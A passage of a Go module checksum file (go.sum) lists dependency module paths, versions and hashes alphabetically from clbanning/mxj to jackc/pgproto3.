 52 | github.com/clbanning/mxj v1.8.5-0.20200714211355-ff02cfb8ea28 h1:LdXxtjzvZYhhUaonAaAKArG3pyC67kGL3YY+6hGG8G4=
 53 | github.com/clbanning/mxj v1.8.5-0.20200714211355-ff02cfb8ea28/go.mod h1:BVjHeAH+rl9rs6f+QIpeRl0tfu10SXn1pUSa5PVGJng=
 54 | github.com/clbanning/x2j v0.0.0-20191024224557-825249438eec/go.mod h1:jMjuTZXRI4dUb/I5gc9Hdhagfvm9+RyrPryS/auMzxE=
 55 | github.com/client9/misspell v0.3.4/go.mod h1:qj6jICC3Q7zFZvVWo7KLAzC3yx5G7kyvSDkc90ppPyw=
 56 | github.com/cockroachdb/apd v1.1.0/go.mod h1:8Sl8LxpKi29FqWXR16WEFZRNSz3SoPzUzeMeY4+DwBQ=
 57 | github.com/cockroachdb/datadriven v0.0.0-20190809214429-80d97fb3cbaa/go.mod h1:zn76sxSg3SzpJ0PPJaLDCu+Bu0Lg3sKTORVIj19EIF8=
 58 | github.com/codahale/hdrhistogram v0.0.0-20161010025455-3a0bb77429bd/go.mod h1:sE/e/2PUdi/liOCUjSTXgM1o87ZssimdTWN964YiIeI=
 59 | github.com/codegangsta/inject v0.0.0-20150114235600-33e0aa1cb7c0 h1:sDMmm+q/3+BukdIpxwO365v/Rbspp2Nt5XntgQRXq8Q=
 60 | github.com/codegangsta/inject v0.0.0-20150114235600-33e0aa1cb7c0/go.mod h1:4Zcjuz89kmFXt9morQgcfYZAYZ5n8WHjt81YYWIwtTM=
 61 | github.com/codeskyblue/go-sh v0.0.0-20200712050446-30169cf553fe h1:69JI97HlzP+PH5Mi1thcGlDoBr6PS2Oe+l3mNmAkbs4=
 62 | github.com/codeskyblue/go-sh v0.0.0-20200712050446-30169cf553fe/go.mod h1:VQx0hjo2oUeQkQUET7wRwradO6f+fN5jzXgB/zROxxE=
 63 | github.com/cokeBeer/goot v0.0.33 h1:c9w5dK79OWfRrLnUC4a6rSBNS6KZkg33bvP7F12GYXM=
 64 | github.com/cokeBeer/goot v0.0.33/go.mod h1:LoTU6KaJHHDMCLmvX6yXRu6SYqN+EJqR3B5t+RAqk28=
 65 | github.com/coreos/go-semver v0.2.0/go.mod h1:nnelYz7RCh+5ahJtPPxZlU+153eP4D4r3EedlOD2RNk=
 66 | github.com/coreos/go-systemd v0.0.0-20180511133405-39ca1b05acc7/go.mod h1:F5haX7vjVVG0kc13fIWeqUViNPyEJxv/OmvnBo0Yme4=
 67 | github.com/coreos/go-systemd v0.0.0-20190321100706-95778dfbb74e/go.mod h1:F5haX7vjVVG0kc13fIWeqUViNPyEJxv/OmvnBo0Yme4=
 68 | github.com/coreos/go-systemd v0.0.0-20190719114852-fd7a80b32e1f/go.mod h1:F5haX7vjVVG0kc13fIWeqUViNPyEJxv/OmvnBo0Yme4=
 69 | github.com/coreos/pkg v0.0.0-20160727233714-3ac0863d7acf/go.mod h1:E3G3o1h8I7cfcXa63jLwjI0eiQQMgzzUDFVpN/nH/eA=
 70 | github.com/cpuguy83/go-md2man/v2 v2.0.0-20190314233015-f79a8a8ca69d/go.mod h1:maD7wRr/U5Z6m/iR4s+kqSMx2CaBsrgA7czyZG/E6dU=
 71 | github.com/creack/pty v1.1.7/go.mod h1:lj5s0c3V2DBrqTV7llrYr5NG6My20zk30Fl46Y7DoTY=
 72 | github.com/creack/pty v1.1.9/go.mod h1:oKZEueFk5CKHvIhNR5MUki03XCEU+Q6VDXinZuGJ33E=
 73 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 74 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 75 | github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc h1:U9qPSI2PIWSS1VwoXQT9A3Wy9MM3WgvqSxFWenqJduM=
 76 | github.com/davecgh/go-spew v1.1.2-0.20180830191138-d8f796af33cc/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
 77 | github.com/denisenkom/go-mssqldb v0.0.0-20191124224453-732737034ffd/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU=
 78 | github.com/denisenkom/go-mssqldb v0.10.0 h1:QykgLZBorFE95+gO3u9esLd0BmbvpWp0/waNNZfHBM8=
 79 | github.com/denisenkom/go-mssqldb v0.10.0/go.mod h1:xbL0rPBG9cCiLr28tMa8zpbdarY27NDyej4t/EjAShU=
 80 | github.com/dgrijalva/jwt-go v3.2.0+incompatible/go.mod h1:E3ru+11k8xSBh+hMPgOLZmtrrCbhqsmaPHjLKYnJCaQ=
 81 | github.com/dnote/color v1.7.0 h1:8/QGLQKSU8/zcWQaHbMyC1hJRkKO/Uu9M89sH76ecHE=
 82 | github.com/dnote/color v1.7.0/go.mod h1:75UcP/TH7CNvjQ5pwDumkUS3vkPdGggy7/3fT8MlxHM=
 83 | github.com/dustin/go-humanize v0.0.0-20171111073723-bb3d318650d4/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk=
 84 | github.com/dustin/go-humanize v1.0.0/go.mod h1:HtrtbFcZ19U5GC7JDqmcUSB87Iq5E25KnS6fMYU6eOk=
 85 | github.com/dustin/go-humanize v1.0.1 h1:GzkhY7T5VNhEkwH0PVJgjz+fX1rhBrR7pRT3mDkpeCY=
 86 | github.com/dustin/go-humanize v1.0.1/go.mod h1:Mu1zIs6XwVuF/gI1OepvI0qD18qycQx+mFykh5fBlto=
 87 | github.com/eapache/go-resiliency v1.1.0/go.mod h1:kFI+JgMyC7bLPUVY133qvEBtVayf5mFgVsvEsIPBvNs=
 88 | github.com/eapache/go-xerial-snappy v0.0.0-20180814174437-776d5712da21/go.mod h1:+020luEh2TKB4/GOp8oxxtq0Daoen/Cii55CzbTV6DU=
 89 | github.com/eapache/queue v1.1.0/go.mod h1:6eCeP0CKFpHLu8blIFXhExK/dRa7WDZfr6jVFPTqq+I=
 90 | github.com/edsrzf/mmap-go v1.0.0/go.mod h1:YO35OhQPt3KJa3ryjFM5Bs14WD66h8eGKpfaBNrHW5M=
 91 | github.com/elazarl/go-bindata-assetfs v1.0.1 h1:m0kkaHRKEu7tUIUFVwhGGGYClXvyl4RE03qmvRTNfbw=
 92 | github.com/elazarl/go-bindata-assetfs v1.0.1/go.mod h1:v+YaWX3bdea5J/mo8dSETolEo7R71Vk1u8bnjau5yw4=
 93 | github.com/envoyproxy/go-control-plane v0.6.9/go.mod h1:SBwIajubJHhxtWwsL9s8ss4safvEdbitLhGGK48rN6g=
 94 | github.com/envoyproxy/go-control-plane v0.9.1-0.20191026205805-5f8ba28d4473/go.mod h1:YTl/9mNaCwkRvm6d1a2C3ymFceY/DCBVvsKhRF0iEA4=
 95 | github.com/envoyproxy/protoc-gen-validate v0.1.0/go.mod h1:iSmxcyjqTsJpI2R4NaDN7+kN2VEUnK/pcBlmesArF7c=
 96 | github.com/erikstmartin/go-testdb v0.0.0-20160219214506-8d10e4a1bae5 h1:Yzb9+7DPaBjB8zlTR87/ElzFsnQfuHnVUVqpZZIcV5Y=
 97 | github.com/erikstmartin/go-testdb v0.0.0-20160219214506-8d10e4a1bae5/go.mod h1:a2zkGnVExMxdzMo3M0Hi/3sEU+cWnZpSni0O6/Yb/P0=
 98 | github.com/fatih/color v1.7.0/go.mod h1:Zm6kSWBoL9eyXnKyktHP6abPY2pDugNf5KwzbycvMj4=
 99 | github.com/fatih/color v1.12.0/go.mod h1:ELkj/draVOlAH/xkhN6mQ50Qd0MPOk5AAr3maGEBuJM=
100 | github.com/fatih/color v1.13.0 h1:8LOYc1KYPPmyKMuN8QV2DNRWNbLo6LZ0iLs8+mlH53w=
101 | github.com/fatih/color v1.13.0/go.mod h1:kLAiJbzzSOZDVNGyDpeOxJ47H46qBXwg5ILebYFFOfk=
102 | github.com/franela/goblin v0.0.0-20200105215937-c9ffbefa60db/go.mod h1:7dvUGVsVBjqR7JHJk0brhHOZYGmfBYOrK0ZhYMEtBr4=
103 | github.com/franela/goreq v0.0.0-20171204163338-bcd34c9993f8/go.mod h1:ZhphrRTfi2rbfLwlschooIH4+wKKDR4Pdxhh+TRoA20=
104 | github.com/fsnotify/fsnotify v1.4.7/go.mod h1:jwhsz4b93w/PPRr/qN1Yymfu8t87LnFCMoQvtojpjFo=
105 | github.com/fsnotify/fsnotify v1.4.9/go.mod h1:znqG4EE+3YCdAaPaxE2ZRY/06pZUdp0tY4IgpuI1SZQ=
106 | github.com/fsnotify/fsnotify v1.5.1/go.mod h1:T3375wBYaZdLLcVNkcVbzGHY7f1l/uK5T5Ai1i3InKU=
107 | github.com/fsnotify/fsnotify v1.7.0 h1:8JEhPFa5W2WU7YfeZzPNqzMP6Lwt7L2715Ggo0nosvA=
108 | github.com/fsnotify/fsnotify v1.7.0/go.mod h1:40Bi/Hjc2AVfZrqy+aj+yEI+/bRxZnMJyTJwOpGvigM=
109 | github.com/ghodss/yaml v1.0.0/go.mod h1:4dBDuWmgqj2HViK6kFavaiC9ZROes6MMH2rRYeMEF04=
110 | github.com/go-kit/kit v0.8.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as=
111 | github.com/go-kit/kit v0.9.0/go.mod h1:xBxKIO96dXMWWy0MnWVtmwkA9/13aqxPnvrjFYMA2as=
112 | github.com/go-kit/kit v0.10.0/go.mod h1:xUsJbQ/Fp4kEt7AFgCuvyX4a71u8h9jB8tj/ORgOZ7o=
113 | github.com/go-logfmt/logfmt v0.3.0/go.mod h1:Qt1PoO58o5twSAckw1HlFXLmHsOX5/0LbT9GBnD5lWE=
114 | github.com/go-logfmt/logfmt v0.4.0/go.mod h1:3RMwSq7FuexP4Kalkev3ejPJsZTpXXBr9+V4qmtdjCk=
115 | github.com/go-logfmt/logfmt v0.5.0/go.mod h1:wCYkCAKZfumFQihp8CzCvQ3paCTfi41vtzG1KdI/P7A=
116 | github.com/go-logr/logr v1.2.2/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A=
117 | github.com/go-logr/logr v1.2.3 h1:2DntVwHkVopvECVRSlL5PSo9eG+cAkDCuckLubN+rq0=
118 | github.com/go-logr/logr v1.2.3/go.mod h1:jdQByPbusPIv2/zmleS9BjJVeZ6kBagPoEUsqbVz/1A=
119 | github.com/go-logr/stdr v1.2.2 h1:hSWxHoqTgW2S2qGc0LTAI563KZ5YKYRhT3MFKZMbjag=
120 | github.com/go-logr/stdr v1.2.2/go.mod h1:mMo/vtBO5dYbehREoey6XUKy/eSumjCCveDpRre4VKE=
121 | github.com/go-sql-driver/mysql v1.4.0/go.mod h1:zAC/RDZ24gD3HViQzih4MyKcchzm+sOG5ZlKdlhCg5w=
122 | github.com/go-sql-driver/mysql v1.5.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg=
123 | github.com/go-sql-driver/mysql v1.6.0/go.mod h1:DCzpHaOWr8IXmIStZouvnhqoel9Qv2LBy8hT2VhHyBg=
124 | github.com/go-sql-driver/mysql v1.7.1 h1:lUIinVbN1DY0xBg0eMOzmmtGoHwWBbvnWubQUrtU8EI=
125 | github.com/go-sql-driver/mysql v1.7.1/go.mod h1:OXbVy3sEdcQ2Doequ6Z5BW6fXNQTmx+9S1MCJN5yJMI=
126 | github.com/go-stack/stack v1.8.0/go.mod h1:v0f6uXyyMGvRgIKkXu+yp6POWl0qKG85gN/melR3HDY=
127 | github.com/go-task/slim-sprig v0.0.0-20210107165309-348f09dbbbc0/go.mod h1:fyg7847qk6SyHyPtNmDHnmrv/HOrqktSC+C9fM+CJOE=
128 | github.com/goccy/go-json v0.8.1/go.mod h1:6MelG93GURQebXPDq3khkgXZkazVtN9CRI+MGFi0w8I=
129 | github.com/goccy/go-json v0.9.11 h1:/pAaQDLHEoCq/5FFmSKBswWmK6H0e8g4159Kc/X/nqk=
130 | github.com/goccy/go-json v0.9.11/go.mod h1:6MelG93GURQebXPDq3khkgXZkazVtN9CRI+MGFi0w8I=
131 | github.com/gofrs/uuid v3.2.0+incompatible/go.mod h1:b2aQJv3Z4Fp6yNu3cdSllBxTCLRxnplIgP/c0N/04lM=
132 | github.com/gofrs/uuid v4.0.0+incompatible/go.mod h1:b2aQJv3Z4Fp6yNu3cdSllBxTCLRxnplIgP/c0N/04lM=
133 | github.com/gogf/gf v1.16.9 h1:Q803UmmRo59+Ws08sMVFOcd8oNpkSWL9vS33hlo/Cyk=
134 | github.com/gogf/gf v1.16.9/go.mod h1:8Q/kw05nlVRp+4vv7XASBsMe9L1tsVKiGoeP2AHnlkk=
135 | github.com/gogo/googleapis v1.1.0/go.mod h1:gf4bu3Q80BeJ6H1S1vYPm8/ELATdvryBaNFGgqEef3s=
136 | github.com/gogo/protobuf v1.1.1/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
137 | github.com/gogo/protobuf v1.2.0/go.mod h1:r8qH/GZQm5c6nD/R0oafs1akxWv10x8SbQlK7atdtwQ=
138 | github.com/gogo/protobuf v1.2.1/go.mod h1:hp+jE20tsWTFYpLwKvXlhS1hjn+gTNwPg2I6zVXpSg4=
139 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe h1:lXe2qZdvpiX5WZkZR4hgp4KJVfY3nMkvmwbVkpv1rVY=
140 | github.com/golang-sql/civil v0.0.0-20190719163853-cb61b32ac6fe/go.mod h1:8vg3r2VgvsThLBIFL93Qb5yWzgyZWhEmBwUJWevAkK0=
141 | github.com/golang/glog v0.0.0-20160126235308-23def4e6c14b/go.mod h1:SBH7ygxi8pfUlaOkMMuAQtPIUF8ecWP5IEl/CR7VP2Q=
142 | github.com/golang/groupcache v0.0.0-20160516000752-02826c3e7903/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
143 | github.com/golang/groupcache v0.0.0-20190702054246-869f871628b6/go.mod h1:cIg4eruTrX1D+g88fzRXU5OdNfaM+9IcxsU14FzY7Hc=
144 | github.com/golang/mock v1.1.1/go.mod h1:oTYuIxOrZwtPieC+H1uAHpcLFnEyAGVDL/k47Jfbm0A=
145 | github.com/golang/protobuf v1.2.0/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
146 | github.com/golang/protobuf v1.3.1/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
147 | github.com/golang/protobuf v1.3.2/go.mod h1:6lQm79b+lXiMfvg/cZm0SGofjICqVBUtrP5yJMmIC1U=
148 | github.com/golang/protobuf v1.4.0-rc.1/go.mod h1:ceaxUfeHdC40wWswd/P6IGgMaK3YpKi5j83Wpe3EHw8=
149 | github.com/golang/protobuf v1.4.0-rc.1.0.20200221234624-67d41d38c208/go.mod h1:xKAWHe0F5eneWXFV3EuXVDTCmh+JuBKY0li0aMyXATA=
150 | github.com/golang/protobuf v1.4.0-rc.2/go.mod h1:LlEzMj4AhA7rCAGe4KMBDvJI+AwstrUpVNzEA03Pprs=
151 | github.com/golang/protobuf v1.4.0-rc.4.0.20200313231945-b860323f09d0/go.mod h1:WU3c8KckQ9AFe+yFwt9sWVRKCVIyN9cPHBJSNnbL67w=
152 | github.com/golang/protobuf v1.4.0/go.mod h1:jodUvKwWbYaEsadDk5Fwe5c77LiNKVO9IDvqG2KuDX0=
153 | github.com/golang/protobuf v1.4.2/go.mod h1:oDoupMAO8OvCJWAcko0GGGIgR6R6ocIYbsSw735rRwI=
154 | github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
155 | github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
156 | github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg=
157 | github.com/golang/protobuf v1.5.3/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
158 | github.com/golang/snappy v0.0.0-20180518054509-2e65f85255db/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
159 | github.com/golang/snappy v0.0.1/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
160 | github.com/golang/snappy v0.0.4 h1:yAGX7huGHXlcLOEtBnF4w7FQwA26wojNCwOYAEhLjQM=
161 | github.com/golang/snappy v0.0.4/go.mod h1:/XxbfmMg8lxefKM7IXC3fBNl/7bRcc72aCRzEWrmP2Q=
162 | github.com/gomodule/redigo v1.8.5/go.mod h1:P9dn9mFrCBvWhGE1wpxx6fgq7BAeLBk+UUUzlpkBYO0=
163 | github.com/gomodule/redigo v2.0.0+incompatible h1:K/R+8tc58AaqLkqG2Ol3Qk+DR/TlNuhuh457pBFPtt0=
164 | github.com/gomodule/redigo v2.0.0+incompatible/go.mod h1:B4C85qUVwatsJoIUNIfCRsp7qO0iAmpGFZ4EELWSbC4=
165 | github.com/google/btree v0.0.0-20180813153112-4030bb1f1f0c/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
166 | github.com/google/btree v1.0.0/go.mod h1:lNA+9X1NB3Zf8V7Ke586lFgjr2dZNuvo3lPJSGZ5JPQ=
167 | github.com/google/go-cmp v0.2.0/go.mod h1:oXzfMopK8JAjlY9xF4vHSVASa0yLyX7SntLO5aqRK0M=
168 | github.com/google/go-cmp v0.3.0/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
169 | github.com/google/go-cmp v0.3.1/go.mod h1:8QqcDgzrUqlUb/G2PQTWiueGozuR1884gddMywk6iLU=
170 | github.com/google/go-cmp v0.4.0/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
171 | github.com/google/go-cmp v0.5.3/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
172 | github.com/google/go-cmp v0.5.5/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
173 | github.com/google/go-cmp v0.5.6/go.mod h1:v8dTdLbMG2kIc/vJvl+f65V22dbkXbowE6jgT/gNBxE=
174 | github.com/google/go-cmp v0.6.0 h1:ofyhxvXcZhMsU5ulbFiLKl/XBFqE1GSq7atu8tAmTRI=
175 | github.com/google/go-cmp v0.6.0/go.mod h1:17dUlkBOakJ0+DkrSSNjCkIjxS6bF9zb3elmeNGIjoY=
176 | github.com/google/gofuzz v1.0.0/go.mod h1:dBl0BpW6vV/+mYPU4Po3pmUjxk6FQPldtuIdl/M65Eg=
177 | github.com/google/renameio v0.1.0/go.mod h1:KWCgfxg9yswjAJkECMjeO8J8rahYeXnNhOm40UhjYkI=
178 | github.com/google/uuid v1.0.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
179 | github.com/google/uuid v1.3.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
180 | github.com/google/uuid v1.4.0 h1:MtMxsa51/r9yyhkyLsVeVt0B+BGQZzpQiTQ4eHZ8bc4=
181 | github.com/google/uuid v1.4.0/go.mod h1:TIyPZe4MgqvfeYDBFedMoGGpEw/LqOeaOT+nhxU+yHo=
182 | github.com/gopherjs/gopherjs v0.0.0-20181017120253-0766667cb4d1/go.mod h1:wJfORRmW1u3UXTncJ5qlYoELFm8eSnnEO6hX4iZ3EWY=
183 | github.com/gorilla/context v1.1.1/go.mod h1:kBGZzfjB9CEq2AlWe17Uuf7NDRt0dE0s8S51q0aT7Yg=
184 | github.com/gorilla/mux v1.6.2/go.mod h1:1lud6UwP+6orDFRuTfBEV8e9/aOM/c4fVVCaMa2zaAs=
185 | github.com/gorilla/mux v1.7.3/go.mod h1:1lud6UwP+6orDFRuTfBEV8e9/aOM/c4fVVCaMa2zaAs=
186 | github.com/gorilla/websocket v0.0.0-20170926233335-4201258b820c/go.mod h1:E7qHFY5m1UJ88s3WnNqhKjPHQ0heANvMoAMk2YaljkQ=
187 | github.com/gorilla/websocket v1.4.2 h1:+/TMaTYc4QFitKJxsQ7Yye35DkWvkdLcvGKqM+x0Ufc=
188 | github.com/gorilla/websocket v1.4.2/go.mod h1:YR8l580nyteQvAITg2hZ9XVh4b55+EU/adAjf1fMHhE=
189 | github.com/grokify/html-strip-tags-go v0.0.1 h1:0fThFwLbW7P/kOiTBs03FsJSV9RM2M/Q/MOnCQxKMo0=
190 | github.com/grokify/html-strip-tags-go v0.0.1/go.mod h1:2Su6romC5/1VXOQMaWL2yb618ARB8iVo6/DR99A6d78=
191 | github.com/grpc-ecosystem/go-grpc-middleware v1.0.1-0.20190118093823-f849b5445de4/go.mod h1:FiyG127CGDf3tlThmgyCl78X/SZQqEOJBCDaAfeWzPs=
192 | github.com/grpc-ecosystem/go-grpc-prometheus v1.2.0/go.mod h1:8NvIoxWQoOIhqOTXgfV/d3M/q6VIi02HzZEHgUlZvzk=
193 | github.com/grpc-ecosystem/grpc-gateway v1.9.5/go.mod h1:vNeuVxBJEsws4ogUvrchl83t/GYV9WGTSLVdBhOQFDY=
194 | github.com/hashicorp/consul/api v1.3.0/go.mod h1:MmDNSzIMUjNpY/mQ398R4bk2FnqQLoPndWW5VkKPlCE=
195 | github.com/hashicorp/consul/sdk v0.3.0/go.mod h1:VKf9jXwCTEY1QZP2MOLRhb5i/I/ssyNV1vwHyQBF0x8=
196 | github.com/hashicorp/errwrap v1.0.0/go.mod h1:YH+1FKiLXxHSkmPseP+kNlulaMuP3n2brvKWEqk/Jc4=
197 | github.com/hashicorp/go-cleanhttp v0.5.1/go.mod h1:JpRdi6/HCYpAwUzNwuwqhbovhLtngrth3wmdIIUrZ80=
198 | github.com/hashicorp/go-immutable-radix v1.0.0/go.mod h1:0y9vanUI8NX6FsYoO3zeMjhV/C5i9g4Q3DwcSNZ4P60=
199 | github.com/hashicorp/go-msgpack v0.5.3/go.mod h1:ahLV/dePpqEmjfWmKiqvPkv/twdG7iPBM1vqhUKIvfM=
200 | github.com/hashicorp/go-multierror v1.0.0/go.mod h1:dHtQlpGsu+cZNNAkkCN/P3hoUDHhCYQXV3UM06sGGrk=
201 | github.com/hashicorp/go-rootcerts v1.0.0/go.mod h1:K6zTfqpRlCUIjkwsN4Z+hiSfzSTQa6eBIzfwKfwNnHU=
202 | github.com/hashicorp/go-sockaddr v1.0.0/go.mod h1:7Xibr9yA9JjQq1JpNB2Vw7kxv8xerXegt+ozgdvDeDU=
203 | github.com/hashicorp/go-syslog v1.0.0/go.mod h1:qPfqrKkXGihmCqbJM2mZgkZGvKG1dFdvsLplgctolz4=
204 | github.com/hashicorp/go-uuid v1.0.0/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro=
205 | github.com/hashicorp/go-uuid v1.0.1/go.mod h1:6SBZvOh/SIDV7/2o3Jml5SYk/TvGqwFJ/bN7x4byOro=
206 | github.com/hashicorp/go-version v1.2.0/go.mod h1:fltr4n8CU8Ke44wwGCBoEymUuxUHl09ZGVZPK5anwXA=
207 | github.com/hashicorp/go.net v0.0.1/go.mod h1:hjKkEWcCURg++eb33jQU7oqQcI9XDCnUzHA0oac0k90=
208 | github.com/hashicorp/golang-lru v0.5.0/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
209 | github.com/hashicorp/golang-lru v0.5.1/go.mod h1:/m3WP610KZHVQ1SGc6re/UDhFvYD7pJ4Ao+sR/qLZy8=
210 | github.com/hashicorp/golang-lru v1.0.2 h1:dV3g9Z/unq5DpblPpw+Oqcv4dU/1omnb4Ok8iPY6p1c=
211 | github.com/hashicorp/golang-lru v1.0.2/go.mod h1:iADmTwqILo4mZ8BN3D2Q6+9jd8WM5uGBxy+E8yxSoD4=
212 | github.com/hashicorp/logutils v1.0.0/go.mod h1:QIAnNjmIWmVIIkWDTG1z5v++HQmx9WQRO+LraFDTW64=
213 | github.com/hashicorp/mdns v1.0.0/go.mod h1:tL+uN++7HEJ6SQLQ2/p+z2pH24WQKWjBPkE0mNTz8vQ=
214 | github.com/hashicorp/memberlist v0.1.3/go.mod h1:ajVTdAv/9Im8oMAAj5G31PhhMCZJV2pPBoIllUwCN7I=
215 | github.com/hashicorp/serf v0.8.2/go.mod h1:6hOLApaqBFA1NXqRQAsxw9QxuDEvNxSQRwA/JwenrHc=
216 | github.com/hpcloud/tail v1.0.0/go.mod h1:ab1qPbhIpdTxEkNHXyeSf5vhxWSCs/tWer42PpOxQnU=
217 | github.com/huandu/xstrings v1.3.2 h1:L18LIDzqlW6xN2rEkpdV8+oL/IXWJ1APd+vsdYy4Wdw=
218 | github.com/huandu/xstrings v1.3.2/go.mod h1:y5/lhBue+AyNmUVz9RLU9xbLR0o4KIIExikq4ovT0aE=
219 | github.com/hudl/fargo v1.3.0/go.mod h1:y3CKSmjA+wD2gak7sUSXTAoopbhU08POFhmITJgmKTg=
220 | github.com/imdario/mergo v0.3.12 h1:b6R2BslTbIEToALKP7LxUvijTsNI9TAe80pLWN2g/HU=
221 | github.com/imdario/mergo v0.3.12/go.mod h1:jmQim1M+e3UYxmgPu/WyfjB3N3VflVyUjjjwH0dnCYA=
222 | github.com/inconshreveable/mousetrap v1.0.0/go.mod h1:PxqpIevigyE2G7u3NXJIT2ANytuPF1OarO4DADm73n8=
223 | github.com/influxdata/influxdb1-client v0.0.0-20191209144304-8bf82d3c094d/go.mod h1:qj24IKcXYK6Iy9ceXlo3Tc+vtHo9lIhSX5JddghvEPo=
224 | github.com/jackc/chunkreader v1.0.0/go.mod h1:RT6O25fNZIuasFJRyZ4R/Y2BbhasbmZXF9QQ7T3kePo=
225 | github.com/jackc/chunkreader/v2 v2.0.0/go.mod h1:odVSm741yZoC3dpHEUXIqA9tQRhFrgOHwnPIn9lDKlk=
226 | github.com/jackc/chunkreader/v2 v2.0.1/go.mod h1:odVSm741yZoC3dpHEUXIqA9tQRhFrgOHwnPIn9lDKlk=
227 | github.com/jackc/pgconn v0.0.0-20190420214824-7e0022ef6ba3/go.mod h1:jkELnwuX+w9qN5YIfX0fl88Ehu4XC3keFuOJJk9pcnA=
228 | github.com/jackc/pgconn v0.0.0-20190824142844-760dd75542eb/go.mod h1:lLjNuW/+OfW9/pnVKPazfWOgNfH2aPem8YQ7ilXGvJE=
229 | github.com/jackc/pgconn v0.0.0-20190831204454-2fabfa3c18b7/go.mod h1:ZJKsE/KZfsUgOEh9hBm+xYTstcNHg7UPMVJqRfQxq4s=
230 | github.com/jackc/pgconn v1.4.0/go.mod h1:Y2O3ZDF0q4mMacyWV3AstPJpeHXWGEetiFttmq5lahk=
231 | github.com/jackc/pgconn v1.5.0/go.mod h1:QeD3lBfpTFe8WUnPZWN5KY/mB8FGMIYRdd8P8Jr0fAI=
232 | github.com/jackc/pgconn v1.5.1-0.20200601181101-fa742c524853/go.mod h1:QeD3lBfpTFe8WUnPZWN5KY/mB8FGMIYRdd8P8Jr0fAI=
233 | github.com/jackc/pgconn v1.8.0/go.mod h1:1C2Pb36bGIP9QHGBYCjnyhqu7Rv3sGshaQUvmfGIB/o=
234 | github.com/jackc/pgconn v1.8.1/go.mod h1:JV6m6b6jhjdmzchES0drzCcYcAHS1OPD5xu3OZ/lE2g=
235 | github.com/jackc/pgconn v1.9.0/go.mod h1:YctiPyvzfU11JFxoXokUOOKQXQmDMoJL9vJzHH8/2JY=
236 | github.com/jackc/pgio v1.0.0/go.mod h1:oP+2QK2wFfUWgr+gxjoBH9KGBb31Eio69xUb0w5bYf8=
237 | github.com/jackc/pgmock v0.0.0-20190831213851-13a1b77aafa2/go.mod h1:fGZlG77KXmcq05nJLRkk0+p82V8B8Dw8KN2/V9c/OAE=
238 | github.com/jackc/pgmock v0.0.0-20201204152224-4fe30f7445fd/go.mod h1:hrBW0Enj2AZTNpt/7Y5rr2xe/9Mn757Wtb2xeBzPv2c=
239 | github.com/jackc/pgpassfile v1.0.0/go.mod h1:CEx0iS5ambNFdcRtxPj5JhEz+xB6uRky5eyVu/W2HEg=
240 | github.com/jackc/pgproto3 v1.1.0/go.mod h1:eR5FA3leWg7p9aeAqi37XOTgTIbkABlvcPB3E5rlc78=
241 | github.com/jackc/pgproto3/v2 v2.0.0-alpha1.0.20190420180111-c116219b62db/go.mod h1:bhq50y+xrl9n5mRYyCBFKkpRVTLYJVWeCc+mEAI3yXA=
242 | github.com/jackc/pgproto3/v2 v2.0.0-alpha1.0.20190609003834-432c2951c711/go.mod h1:uH0AWtUmuShn0bcesswc4aBTWGvw0cAxIJp+6OB//Wg=
243 | github.com/jackc/pgproto3/v2 v2.0.0-rc3/go.mod h1:ryONWYqW6dqSg1Lw6vXNMXoBJhpzvWKnT95C46ckYeM=
244 | github.com/jackc/pgproto3/v2 v2.0.0-rc3.0.20190831210041-4c03ce451f29/go.mod h1:ryONWYqW6dqSg1Lw6vXNMXoBJhpzvWKnT95C46ckYeM=
245 | github.com/jackc/pgproto3/v2 v2.0.1/go.mod h1:WfJCnwN3HIg9Ish/j3sgWXnAfK8A9Y0bwXYU5xKaEdA=
246 | github.com/jackc/pgproto3/v2 v2.0.6/go.mod h1:WfJCnwN3HIg9Ish/j3sgWXnAfK8A9Y0bwXYU5xKaEdA=
